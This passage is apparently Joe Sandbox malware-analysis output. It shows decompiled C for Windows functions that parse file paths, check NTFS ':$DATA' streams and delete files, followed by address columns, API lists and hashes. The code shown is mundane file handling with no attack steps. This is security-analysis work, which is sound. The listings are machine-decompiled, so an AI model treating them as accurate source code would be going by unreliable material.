				signed int _t173;
				intOrPtr _t174;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t184;
				signed char _t185;
				signed int _t192;
				intOrPtr _t200;
				intOrPtr _t202;
				signed int _t206;
				signed int _t208;
				intOrPtr _t209;
				signed int _t210;
				signed int _t224;
				signed int _t228;
				signed int _t235;
				intOrPtr _t236;
				signed int _t239;
				signed int _t240;
				signed int _t247;
				void* _t253;
				signed int _t254;
				signed int _t256;
				void* _t258;
				intOrPtr* _t259;
				intOrPtr* _t260;
				intOrPtr* _t266;
				void* _t281;
				signed int _t309;
				intOrPtr* _t330;
				long _t332;
				intOrPtr* _t334;
				void* _t336;

				E0041F1B0(E00422FA0, _t336);
				_t330 =  *((intOrPtr*)(_t336 + 8));
				_t334 = __ecx;
				_t168 =  *_t330;
				if(_t168 == 0x5c || _t168 == 0x2f) {
					_t169 =  *((intOrPtr*)(_t330 + 2));
					if(_t169 == 0x5c || _t169 == 0x2f) {
						_t253 = _t330 + 4;
						if( *((short*)(_t330 + 4)) != 0x2e ||  *((short*)(_t330 + 6)) != 0) {
							goto L7;
						} else {
							E003B64DB(_t334);
							E003B2ECB(_t334 + 0x28, _t253);
							 *(_t334 + 0x20) = 0x10;
							goto L89;
						}
					} else {
						goto L7;
					}
				} else {
					L7:
					__eflags = E003B833A(_t330);
					if(__eflags == 0) {
						_t254 = E003B859C(_t330, __eflags);
						__eflags = _t254;
						if(_t254 < 0) {
							L46:
							 *(_t336 - 0x10) =  *(_t336 - 0x10) | 0xffffffff;
							 *(_t336 - 4) = 6;
							_t255 = 0;
							_t172 = E003B84D0(_t330);
							__eflags = _t172;
							if(_t172 != 0) {
								_t255 = 4;
							}
							 *((intOrPtr*)(_t336 + 8)) = _t330 + _t255 * 2;
							_t173 = E003B82B8(_t330 + _t255 * 2);
							__eflags = _t173;
							if(_t173 == 0) {
								L56:
								_t174 =  *_t330;
								__eflags = _t174 - 0x5c;
								if(_t174 == 0x5c) {
									L58:
									__eflags =  *((short*)(_t330 + 2));
									_t266 = _t330;
									if( *((short*)(_t330 + 2)) != 0) {
										_t175 = E003B8458(_t266);
										__eflags = _t175;
										if(__eflags <= 0) {
											goto L75;
										}
										__eflags =  *(_t330 + _t175 * 2);
										_t255 = _t330 + _t175 * 2;
										 *(_t336 - 0x14) = _t330 + _t175 * 2;
										if(__eflags == 0) {
											goto L75;
										}
										__eflags = E003B824E(_t255);
										if(__eflags >= 0) {
											goto L75;
										}
										_t180 = E003B6E51(_t334, __eflags, _t330);
										__eflags = _t180;
										if(_t180 == 0) {
											_t136 = _t336 - 0x44; // -68
											E003B2D8A(_t136, _t330);
											_t137 = _t336 - 0x44; // -68
											 *(_t336 - 4) = 7;
											E003B1089(_t137, 0x5c);
											_t139 = _t336 - 0x44; // -68
											E003B1089(_t139, 0x2a);
											 *(_t336 + 0xb) =  *(_t336 + 0xb) & 0x00000000;
											_push(_t334);
											_push( *((intOrPtr*)(_t336 - 0x44)));
											_t143 = _t336 - 0x10; // -16
											_t184 = E003B6553(_t255, _t143, _t330, __eflags);
											__eflags = _t184;
											if(_t184 == 0) {
												L71:
												_t185 = E003B68E0(_t330);
												__eflags =  *(_t336 + 0xb);
												_t255 = _t185;
												if( *(_t336 + 0xb) != 0) {
													L83:
													E003B64DB(_t334);
													__eflags = _t255 - 0xffffffff;
													if(_t255 == 0xffffffff) {
														 *(_t334 + 0x20) = 0x10;
													} else {
														 *(_t334 + 0x20) = _t255;
													}
													_push( *(_t336 - 0x14));
													_t281 = _t334 + 0x28;
													L87:
													E003B1E40(E003B2ECB(_t281),  *((intOrPtr*)(_t336 - 0x44)));
													L88:
													_t165 = _t336 - 0x10; // -16
													E003B6533(_t165);
													L89:
													_t178 = 1;
													goto L82;
												}
												__eflags = _t255 - 0xffffffff;
												if(__eflags == 0) {
													L74:
													 *(_t336 - 4) = 6;
													E003B1E40(_t185,  *((intOrPtr*)(_t336 - 0x44)));
													goto L75;
												}
												__eflags = _t255 & 0x00000010;
												if(__eflags != 0) {
													goto L83;
												}
												goto L74;
											}
											_t258 = _t334 + 0x28;
											_t192 = wcscmp( *(_t334 + 0x28), 0x429394);
											__eflags = _t192;
											if(_t192 != 0) {
												 *(_t336 + 0xb) = 1;
												goto L71;
											}
											_push( *(_t336 - 0x14));
											_t281 = _t258;
											goto L87;
										}
										E003B2ECB(_t334 + 0x28, _t255);
										goto L88;
									}
									_t255 = E003B68E0(_t266);
									__eflags = _t255 - 0xffffffff;
									if(__eflags == 0) {
										goto L75;
									}
									__eflags = _t255 & 0x00000010;
									if(__eflags == 0) {
										goto L75;
									}
									E003B64DB(_t334);
									 *(_t334 + 0x2c) =  *(_t334 + 0x2c) & 0x00000000;
									 *( *(_t334 + 0x28)) =  *( *(_t334 + 0x28)) & 0x00000000;
									 *(_t334 + 0x20) = _t255;
									goto L55;
								}
								__eflags = _t174 - 0x2f;
								if(__eflags != 0) {
									goto L75;
								}
								goto L58;
							} else {
								__eflags =  *((short*)(_t330 + 6 + _t255 * 2));
								if( *((short*)(_t330 + 6 + _t255 * 2)) != 0) {
									goto L56;
								}
								_t255 = E003B68E0(_t330);
								__eflags = _t255 - 0xffffffff;
								if(__eflags == 0) {
									L75:
									_push(_t334);
									_push(_t330);
									_t153 = _t336 - 0x10; // -16, executed
									_t176 = E003B6553(_t255, _t153, _t330, __eflags); // executed
									__eflags =  *((char*)(_t336 + 0xc));
									if( *((char*)(_t336 + 0xc)) != 0) {
										__eflags = _t176;
										if(_t176 != 0) {
											__eflags =  *(_t334 + 0x20) >> 0x0000000a & 0x00000001;
											if(__eflags != 0) {
												_t176 = E003B6E51(_t334, __eflags, _t330);
											}
										}
									}
									_t256 = _t176;
									L80:
									_t158 = _t336 - 0x10; // -16
									E003B6533(_t158);
									L81:
									_t178 = _t256;
									L82:
									 *[fs:0x0] =  *((intOrPtr*)(_t336 - 0xc));
									return _t178;
								}
								__eflags = _t255 & 0x00000010;
								if(__eflags == 0) {
									goto L75;
								}
								E003B64DB(_t334);
								 *(_t334 + 0x20) = _t255;
								_t259 = _t334 + 0x28;
								E003B2ECB(_t259,  *((intOrPtr*)(_t336 + 8)));
								_t200 = 2;
								__eflags =  *((intOrPtr*)(_t259 + 4)) - _t200;
								if(__eflags > 0) {
									 *((intOrPtr*)(_t259 + 4)) = _t200;
									_t202 =  *_t259;
									_t121 = _t202 + 4;
									 *_t121 =  *(_t202 + 4) & 0x00000000;
									__eflags =  *_t121;
								}
								E003B6E51(_t334, __eflags, _t330);
								L55:
								_t256 = 1;
								goto L80;
							}
						}
						__eflags =  *((short*)(_t330 + 2 + _t254 * 2));
						if( *((short*)(_t330 + 2 + _t254 * 2)) == 0) {
							goto L46;
						}
						_t41 = _t336 - 0x2c; // -44
						E003B2D8A(_t41, _t330 + _t254 * 2);
						_t42 = _t336 - 0x38; // -56
						 *(_t336 - 4) = 1;
						E003B2D8A(_t42, _t330);
						__eflags = _t254 -  *(_t336 - 0x34);
						 *(_t336 - 4) = 2;
						if(_t254 <  *(_t336 - 0x34)) {
							_t236 =  *((intOrPtr*)(_t336 - 0x38));
							 *(_t336 - 0x34) = _t254;
							_t48 = _t236 + _t254 * 2;
							 *_t48 =  *(_t236 + _t254 * 2) & 0x00000000;
							__eflags =  *_t48;
						}
						_t206 =  *(_t336 - 0x28);
						__eflags = _t206 - 6;
						if(_t206 <= 6) {
							L24:
							_t57 = _t336 - 0x2c; // -44
							E003B3164(_t57, ":$DATA");
							goto L25;
						} else {
							_t235 = E003B2407( *((intOrPtr*)(_t336 - 0x2c)) + _t206 * 2 - 0xc, ":$DATA");
							__eflags = _t235;
							if(_t235 != 0) {
								L25:
								_t208 = E003B84B5( *((intOrPtr*)(_t336 - 0x38)));
								__eflags = _t208;
								_t209 =  *((intOrPtr*)(_t336 - 0x38));
								if(_t208 == 0) {
									L31:
									_t210 = E003B695D(_t334, _t209,  *((intOrPtr*)(_t336 + 0xc)));
									__eflags = _t210;
									if(_t210 == 0) {
										E003B1E40(E003B1E40(_t210,  *((intOrPtr*)(_t336 - 0x38))),  *((intOrPtr*)(_t336 - 0x2c)));
										goto L46;
									}
									_t332 = 0;
									__eflags = 0;
									L33:
									 *(_t334 + 0x20) =  *(_t334 + 0x20) & 0x0000fbef;
									_t68 = _t336 - 0x60;
									 *_t68 =  *(_t336 - 0x60) | 0xffffffff;
									__eflags =  *_t68;
									 *_t334 = _t332;
									 *((intOrPtr*)(_t334 + 4)) = _t332;
									_t71 = _t336 - 0x38; // -56
									_t72 = _t336 - 0x5c; // -92
									 *(_t336 - 4) = 3;
									E003B2E5F(_t72,  *_t68, _t71);
									_t74 = _t336 - 0x50; // -80
									 *(_t336 - 4) = 4;
									E003B2D47(_t74);
									while(1) {
										_t76 = _t336 + 0xf; // 0xf
										_t77 = _t336 - 0x60; // -96
										_t78 = _t336 - 0x50; // -80
										 *(_t336 - 4) = 5;
										_t218 = E003B68A0(_t77, _t336, _t78);
										__eflags = _t218;
										if(_t218 == 0) {
											break;
										}
										__eflags =  *((char*)(_t336 + 0xf));
										if( *((char*)(_t336 + 0xf)) == 0) {
											SetLastError(2);
											break;
										}
										_t224 = E003B22BF( *((intOrPtr*)(_t336 - 0x50)),  *((intOrPtr*)(_t336 - 0x2c)));
										__eflags = _t224;
										if(_t224 != 0) {
											_t309 =  *(_t336 - 0x4c);
											__eflags = _t309 - 7;
											if(__eflags > 0) {
												_t228 = _t309 - 6;
												__eflags = _t228 - _t309;
												if(__eflags < 0) {
													 *(_t336 - 0x4c) = _t228;
													 *((short*)( *((intOrPtr*)(_t336 - 0x50)) + _t228 * 2)) = _t332;
												}
											}
											_t92 = _t336 - 0x50; // -80
											E003B3128(_t334 + 0x28, __eflags, _t92);
											 *((char*)(_t334 + 0x24)) = 1;
											 *_t334 =  *((intOrPtr*)(_t336 - 0x40));
											_t218 =  *((intOrPtr*)(_t336 - 0x3c));
											 *((intOrPtr*)(_t334 + 4)) =  *((intOrPtr*)(_t336 - 0x3c));
											_t256 = 1;
											L44:
											E003B1E40(E003B1E40(_t218,  *((intOrPtr*)(_t336 - 0x50))),  *(_t336 - 0x5c));
											_t100 = _t336 - 0x60; // -96
											E003B1E40(E003B1E40(E003B6533(_t100),  *((intOrPtr*)(_t336 - 0x38))),  *((intOrPtr*)(_t336 - 0x2c)));
											goto L81;
										}
										 *(_t336 - 4) = 4;
										E003B1E40(_t224,  *((intOrPtr*)(_t336 - 0x50)));
										_t85 = _t336 - 0x50; // -80
										E003B2D47(_t85);
									}
									_t256 = 0;
									goto L44;
								}
								__eflags = _t254 - 2;
								if(_t254 == 2) {
									L29:
									E003B64DB(_t334);
									_t315 = _t334 + 0x28;
									_t332 = 0;
									__eflags = _t254 - 2;
									 *((intOrPtr*)(_t334 + 0x2c)) = 0;
									 *( *(_t334 + 0x28)) = 0;
									if(_t254 == 2) {
										_t64 = _t336 - 0x38; // -56
										E003B2F2F(_t315, _t64);
									}
									goto L33;
								}
								__eflags = _t254 - 3;
								if(_t254 != 3) {
									goto L31;
								}
								__eflags =  *((short*)(_t209 + 4)) - 0x5c;
								if( *((short*)(_t209 + 4)) != 0x5c) {
									goto L31;
								}
								goto L29;
							}
							goto L24;
						}
					}
					E003B64DB(_t334);
					_t260 = _t330 + 8;
					E003B2ECB(_t334 + 0x28, _t260);
					 *((char*)(_t334 + 0x25)) = 1;
					_t239 = E003B84B5(_t260);
					__eflags = _t239;
					if(_t239 == 0) {
						L12:
						 *(_t336 - 0x60) =  *(_t336 - 0x60) | 0xffffffff;
						 *(_t336 - 0x5c) =  *(_t336 - 0x5c) & 0x00000000;
						 *(_t336 - 4) =  *(_t336 - 4) & 0x00000000;
						_t240 = L003B7817(_t330);
						__eflags = _t240;
						if(_t240 != 0) {
							__eflags =  *((char*)(_t336 - 0x5a));
							if( *((char*)(_t336 - 0x5a)) != 0) {
								 *_t334 =  *((intOrPtr*)(_t336 - 0x58));
								 *((intOrPtr*)(_t334 + 4)) =  *((intOrPtr*)(_t336 - 0x54));
							}
							_t256 = 1;
						} else {
							_t256 = 0;
						}
						_t35 = _t336 - 0x60; // -96
						E003B7322(_t35);
						goto L81;
					}
					__eflags =  *((short*)(_t330 + 0xc));
					if( *((short*)(_t330 + 0xc)) != 0) {
						goto L12;
					}
					 *(_t336 - 0x12) =  *(_t336 - 0x12) & 0x00000000;
					 *((short*)(_t336 - 0x18)) =  *_t260;
					_t15 = _t336 - 0x28; // -40
					_t16 = _t336 - 0x20; // -32
					_t17 = _t336 - 0x34; // -52
					_t18 = _t336 - 0x18; // -24
					 *((short*)(_t336 - 0x16)) = 0x3a;
					 *(_t336 - 0x14) = 0x5c;
					_t247 = E003B8F28(_t18, _t17, _t16, _t15);
					__eflags = _t247;
					if(_t247 == 0) {
						goto L12;
					} else {
						 *_t334 =  *((intOrPtr*)(_t336 - 0x20));
						 *((intOrPtr*)(_t334 + 4)) =  *((intOrPtr*)(_t336 - 0x1c));
						goto L89;
					}
				}
			}











































                                                                                                    0x003b6962
                                                                                                    0x003b696d
                                                                                                    0x003b6970
                                                                                                    0x003b6972
                                                                                                    0x003b6979
                                                                                                    0x003b6981
                                                                                                    0x003b6989
                                                                                                    0x003b6996
                                                                                                    0x003b6999
                                                                                                    0x00000000
                                                                                                    0x003b69a2
                                                                                                    0x003b69a4
                                                                                                    0x003b69ad
                                                                                                    0x003b69b2
                                                                                                    0x00000000
                                                                                                    0x003b69b2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b69be
                                                                                                    0x003b69be
                                                                                                    0x003b69c5
                                                                                                    0x003b69c7
                                                                                                    0x003b6a79
                                                                                                    0x003b6a7b
                                                                                                    0x003b6a7d
                                                                                                    0x003b6c37
                                                                                                    0x003b6c37
                                                                                                    0x003b6c3d
                                                                                                    0x003b6c44
                                                                                                    0x003b6c46
                                                                                                    0x003b6c4b
                                                                                                    0x003b6c4d
                                                                                                    0x003b6c51
                                                                                                    0x003b6c51
                                                                                                    0x003b6c55
                                                                                                    0x003b6c58
                                                                                                    0x003b6c5d
                                                                                                    0x003b6c5f
                                                                                                    0x003b6cbc
                                                                                                    0x003b6cbc
                                                                                                    0x003b6cbf
                                                                                                    0x003b6cc3
                                                                                                    0x003b6ccf
                                                                                                    0x003b6ccf
                                                                                                    0x003b6cd4
                                                                                                    0x003b6cd6
                                                                                                    0x003b6d08
                                                                                                    0x003b6d0d
                                                                                                    0x003b6d0f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6d15
                                                                                                    0x003b6d1a
                                                                                                    0x003b6d1d
                                                                                                    0x003b6d20
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6d2d
                                                                                                    0x003b6d2f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6d38
                                                                                                    0x003b6d3d
                                                                                                    0x003b6d3f
                                                                                                    0x003b6d50
                                                                                                    0x003b6d53
                                                                                                    0x003b6d5a
                                                                                                    0x003b6d5d
                                                                                                    0x003b6d61
                                                                                                    0x003b6d68
                                                                                                    0x003b6d6b
                                                                                                    0x003b6d70
                                                                                                    0x003b6d74
                                                                                                    0x003b6d75
                                                                                                    0x003b6d78
                                                                                                    0x003b6d7b
                                                                                                    0x003b6d80
                                                                                                    0x003b6d82
                                                                                                    0x003b6daa
                                                                                                    0x003b6dac
                                                                                                    0x003b6db1
                                                                                                    0x003b6db5
                                                                                                    0x003b6db7
                                                                                                    0x003b6e14
                                                                                                    0x003b6e16
                                                                                                    0x003b6e1b
                                                                                                    0x003b6e1e
                                                                                                    0x003b6e25
                                                                                                    0x003b6e20
                                                                                                    0x003b6e20
                                                                                                    0x003b6e20
                                                                                                    0x003b6e2c
                                                                                                    0x003b6e2f
                                                                                                    0x003b6e32
                                                                                                    0x003b6e3a
                                                                                                    0x003b6e40
                                                                                                    0x003b6e40
                                                                                                    0x003b6e43
                                                                                                    0x003b6e48
                                                                                                    0x003b6e48
                                                                                                    0x00000000
                                                                                                    0x003b6e48
                                                                                                    0x003b6db9
                                                                                                    0x003b6dbc
                                                                                                    0x003b6dc3
                                                                                                    0x003b6dc6
                                                                                                    0x003b6dca
                                                                                                    0x00000000
                                                                                                    0x003b6dcf
                                                                                                    0x003b6dbe
                                                                                                    0x003b6dc1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6dc1
                                                                                                    0x003b6d87
                                                                                                    0x003b6d90
                                                                                                    0x003b6d97
                                                                                                    0x003b6d9a
                                                                                                    0x003b6da6
                                                                                                    0x00000000
                                                                                                    0x003b6da6
                                                                                                    0x003b6d9c
                                                                                                    0x003b6d9f
                                                                                                    0x00000000
                                                                                                    0x003b6d9f
                                                                                                    0x003b6d45
                                                                                                    0x00000000
                                                                                                    0x003b6d45
                                                                                                    0x003b6cdd
                                                                                                    0x003b6cdf
                                                                                                    0x003b6ce2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6ce8
                                                                                                    0x003b6ceb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6cf3
                                                                                                    0x003b6cfb
                                                                                                    0x003b6cff
                                                                                                    0x003b6d03
                                                                                                    0x00000000
                                                                                                    0x003b6d03
                                                                                                    0x003b6cc5
                                                                                                    0x003b6cc9
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6c61
                                                                                                    0x003b6c61
                                                                                                    0x003b6c67
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6c70
                                                                                                    0x003b6c72
                                                                                                    0x003b6c75
                                                                                                    0x003b6dd0
                                                                                                    0x003b6dd0
                                                                                                    0x003b6dd1
                                                                                                    0x003b6dd2
                                                                                                    0x003b6dd5
                                                                                                    0x003b6dda
                                                                                                    0x003b6dde
                                                                                                    0x003b6de0
                                                                                                    0x003b6de2
                                                                                                    0x003b6dea
                                                                                                    0x003b6ded
                                                                                                    0x003b6df2
                                                                                                    0x003b6df2
                                                                                                    0x003b6ded
                                                                                                    0x003b6de2
                                                                                                    0x003b6df7
                                                                                                    0x003b6df9
                                                                                                    0x003b6df9
                                                                                                    0x003b6dfc
                                                                                                    0x003b6e01
                                                                                                    0x003b6e01
                                                                                                    0x003b6e03
                                                                                                    0x003b6e09
                                                                                                    0x003b6e11
                                                                                                    0x003b6e11
                                                                                                    0x003b6c7b
                                                                                                    0x003b6c7e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6c86
                                                                                                    0x003b6c8e
                                                                                                    0x003b6c91
                                                                                                    0x003b6c96
                                                                                                    0x003b6c9d
                                                                                                    0x003b6c9e
                                                                                                    0x003b6ca1
                                                                                                    0x003b6ca3
                                                                                                    0x003b6ca6
                                                                                                    0x003b6ca8
                                                                                                    0x003b6ca8
                                                                                                    0x003b6ca8
                                                                                                    0x003b6ca8
                                                                                                    0x003b6cb0
                                                                                                    0x003b6cb5
                                                                                                    0x003b6cb5
                                                                                                    0x00000000
                                                                                                    0x003b6cb5
                                                                                                    0x003b6c5f
                                                                                                    0x003b6a83
                                                                                                    0x003b6a89
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6a92
                                                                                                    0x003b6a96
                                                                                                    0x003b6a9c
                                                                                                    0x003b6a9f
                                                                                                    0x003b6aa6
                                                                                                    0x003b6aab
                                                                                                    0x003b6aae
                                                                                                    0x003b6ab2
                                                                                                    0x003b6ab4
                                                                                                    0x003b6ab7
                                                                                                    0x003b6aba
                                                                                                    0x003b6aba
                                                                                                    0x003b6aba
                                                                                                    0x003b6aba
                                                                                                    0x003b6abf
                                                                                                    0x003b6ac2
                                                                                                    0x003b6ac5
                                                                                                    0x003b6adc
                                                                                                    0x003b6ae1
                                                                                                    0x003b6ae4
                                                                                                    0x00000000
                                                                                                    0x003b6ac7
                                                                                                    0x003b6ad3
                                                                                                    0x003b6ad8
                                                                                                    0x003b6ada
                                                                                                    0x003b6ae9
                                                                                                    0x003b6aec
                                                                                                    0x003b6af1
                                                                                                    0x003b6af3
                                                                                                    0x003b6af6
                                                                                                    0x003b6b2e
                                                                                                    0x003b6b34
                                                                                                    0x003b6b39
                                                                                                    0x003b6b3b
                                                                                                    0x003b6c30
                                                                                                    0x00000000
                                                                                                    0x003b6c36
                                                                                                    0x003b6b41
                                                                                                    0x003b6b41
                                                                                                    0x003b6b43
                                                                                                    0x003b6b43
                                                                                                    0x003b6b49
                                                                                                    0x003b6b49
                                                                                                    0x003b6b49
                                                                                                    0x003b6b4d
                                                                                                    0x003b6b4f
                                                                                                    0x003b6b52
                                                                                                    0x003b6b55
                                                                                                    0x003b6b59
                                                                                                    0x003b6b5d
                                                                                                    0x003b6b62
                                                                                                    0x003b6b65
                                                                                                    0x003b6b69
                                                                                                    0x003b6b6e
                                                                                                    0x003b6b6e
                                                                                                    0x003b6b71
                                                                                                    0x003b6b75
                                                                                                    0x003b6b79
                                                                                                    0x003b6b7d
                                                                                                    0x003b6b82
                                                                                                    0x003b6b84
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6b86
                                                                                                    0x003b6b8a
                                                                                                    0x003b6bb4
                                                                                                    0x00000000
                                                                                                    0x003b6bb4
                                                                                                    0x003b6b92
                                                                                                    0x003b6b97
                                                                                                    0x003b6b99
                                                                                                    0x003b6bbe
                                                                                                    0x003b6bc1
                                                                                                    0x003b6bc4
                                                                                                    0x003b6bc6
                                                                                                    0x003b6bc9
                                                                                                    0x003b6bcb
                                                                                                    0x003b6bd0
                                                                                                    0x003b6bd3
                                                                                                    0x003b6bd3
                                                                                                    0x003b6bcb
                                                                                                    0x003b6bd7
                                                                                                    0x003b6bde
                                                                                                    0x003b6be6
                                                                                                    0x003b6bea
                                                                                                    0x003b6bec
                                                                                                    0x003b6bef
                                                                                                    0x003b6bf2
                                                                                                    0x003b6bf4
                                                                                                    0x003b6bff
                                                                                                    0x003b6c06
                                                                                                    0x003b6c19
                                                                                                    0x00000000
                                                                                                    0x003b6c1f
                                                                                                    0x003b6b9e
                                                                                                    0x003b6ba2
                                                                                                    0x003b6ba8
                                                                                                    0x003b6bab
                                                                                                    0x003b6bab
                                                                                                    0x003b6bba
                                                                                                    0x00000000
                                                                                                    0x003b6bba
                                                                                                    0x003b6af8
                                                                                                    0x003b6afb
                                                                                                    0x003b6b09
                                                                                                    0x003b6b0b
                                                                                                    0x003b6b13
                                                                                                    0x003b6b16
                                                                                                    0x003b6b18
                                                                                                    0x003b6b1b
                                                                                                    0x003b6b1e
                                                                                                    0x003b6b21
                                                                                                    0x003b6b23
                                                                                                    0x003b6b27
                                                                                                    0x003b6b27
                                                                                                    0x00000000
                                                                                                    0x003b6b21
                                                                                                    0x003b6afd
                                                                                                    0x003b6b00
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6b02
                                                                                                    0x003b6b07
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b6b07
                                                                                                    0x00000000
                                                                                                    0x003b6ada
                                                                                                    0x003b6ac5
                                                                                                    0x003b69cf
                                                                                                    0x003b69d4
                                                                                                    0x003b69db
                                                                                                    0x003b69e2
                                                                                                    0x003b69e6
                                                                                                    0x003b69eb
                                                                                                    0x003b69ed
                                                                                                    0x003b6a35
                                                                                                    0x003b6a35
                                                                                                    0x003b6a39
                                                                                                    0x003b6a3d
                                                                                                    0x003b6a45
                                                                                                    0x003b6a4a
                                                                                                    0x003b6a4c
                                                                                                    0x003b6a52
                                                                                                    0x003b6a56
                                                                                                    0x003b6a5b
                                                                                                    0x003b6a60
                                                                                                    0x003b6a60
                                                                                                    0x003b6a63
                                                                                                    0x003b6a4e
                                                                                                    0x003b6a4e
                                                                                                    0x003b6a4e
                                                                                                    0x003b6a65
                                                                                                    0x003b6a68
                                                                                                    0x00000000
                                                                                                    0x003b6a68
                                                                                                    0x003b69ef
                                                                                                    0x003b69f4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b69f9
                                                                                                    0x003b69fe
                                                                                                    0x003b6a02
                                                                                                    0x003b6a06
                                                                                                    0x003b6a0a
                                                                                                    0x003b6a0d
                                                                                                    0x003b6a10
                                                                                                    0x003b6a16
                                                                                                    0x003b6a1c
                                                                                                    0x003b6a21
                                                                                                    0x003b6a23
                                                                                                    0x00000000
                                                                                                    0x003b6a25
                                                                                                    0x003b6a28
                                                                                                    0x003b6a2d
                                                                                                    0x00000000
                                                                                                    0x003b6a2d
                                                                                                    0x003b6a23

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B6962
                                                                                                    • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 003B6BB4
                                                                                                      • Part of subcall function 003B695D: wcscmp.MSVCRT ref: 003B6D90
                                                                                                      • Part of subcall function 003B68E0: __EH_prolog.LIBCMT ref: 003B68E5
                                                                                                      • Part of subcall function 003B68E0: GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 003B6905
                                                                                                      • Part of subcall function 003B68E0: GetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000,?), ref: 003B6934
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                                                                                    • String ID: :$DATA
                                                                                                    • API String ID: 3316598575-2587938151
                                                                                                    • Opcode ID: d0edae449124d99d409371e657e390accef819cbd1741bd2799269d5a3e48a63
                                                                                                    • Instruction ID: 41317ed402066a9f46b17fda46d18c683c46d02f5cc8989bf607c85e6b7ab965
                                                                                                    • Opcode Fuzzy Hash: d0edae449124d99d409371e657e390accef819cbd1741bd2799269d5a3e48a63
                                                                                                    • Instruction Fuzzy Hash: F3E105309002099ACF23EFA4C8927EEB7B5FF5431CF10451DEA566BA93DB78A945CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C5BC1 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 84%
                                                                                                    			E003C5BC1(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				char _t53;
				char _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;
				char _t67;
				intOrPtr _t88;
				void* _t90;
				char _t91;
				void* _t93;
				char _t94;
				void* _t96;

				E0041F1B0(0x423de4, _t96);
				_t93 = __ecx;
				 *((intOrPtr*)(_t96 - 0x14)) = 0;
				_t88 = 0;
				 *((char*)(_t96 - 0xd)) = 0;
				 *((char*)(_t96 - 0xe)) = 0;
				E003C30A2(_t96 - 0x28);
				 *((intOrPtr*)(_t96 - 4)) = 0;
				if( *((intOrPtr*)(_t93 + 0x12c)) == 0) {
					L11:
					_t53 = E003C54A8(0, _t93, _t88); // executed
					 *((intOrPtr*)(_t96 - 0x18)) = _t53;
					if( *((intOrPtr*)(_t96 - 0x14)) != 0) {
						L13:
						_t94 =  *((intOrPtr*)(_t96 - 0x14));
						L25:
						E003B1E40(_t53,  *((intOrPtr*)(_t96 - 0x24)));
						_t55 = _t94;
						L26:
						 *[fs:0x0] =  *((intOrPtr*)(_t96 - 0xc));
						return _t55;
					}
					 *((intOrPtr*)(_t96 - 0x14)) = _t53;
					if(_t53 == 0) {
						__eflags =  *((intOrPtr*)(_t96 - 0xd));
						if( *((intOrPtr*)(_t96 - 0xd)) == 0) {
							L24:
							_t94 =  *((intOrPtr*)(_t96 - 0x18));
							goto L25;
						}
						__eflags =  *((intOrPtr*)(_t96 - 0xe));
						 *((intOrPtr*)(_t93 + 0x108)) = _t88;
						 *((intOrPtr*)(_t93 + 0x10c)) = 0;
						 *((char*)(_t93 + 0x3b)) = 1;
						if(__eflags == 0) {
							goto L24;
						}
						_t90 = _t93 + 0xc0;
						_t56 = L003B5D6C( *((intOrPtr*)(_t93 + 0xc0)), __eflags);
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							_push(_t96 - 0xf);
							_push(_t96 - 0x28);
							_push(_t90);
							 *((char*)(_t96 - 0xf)) = 0;
							_t53 = L003C575A(_t93);
							_t91 = _t53;
							__eflags = _t91;
							if(_t91 == 0) {
								__eflags =  *((intOrPtr*)(_t96 - 0xf));
								if( *((intOrPtr*)(_t96 - 0xf)) == 0) {
									 *((char*)(_t93 + 0x38)) = 0;
								} else {
									__eflags =  *((intOrPtr*)(_t96 - 0x28));
									 *((char*)(_t93 + 0x39)) = _t53;
								}
								goto L24;
							}
							E003B1E40(_t53,  *((intOrPtr*)(_t96 - 0x24)));
							_t55 = _t91;
							goto L26;
						}
						_push(_t90);
						_push("can\'t delete file");
						_t53 = L003C3A05(_t93);
						__eflags = _t53;
						if(_t53 == 0) {
							goto L19;
						} else {
							_t94 = _t53;
							goto L25;
						}
					}
					goto L13;
				}
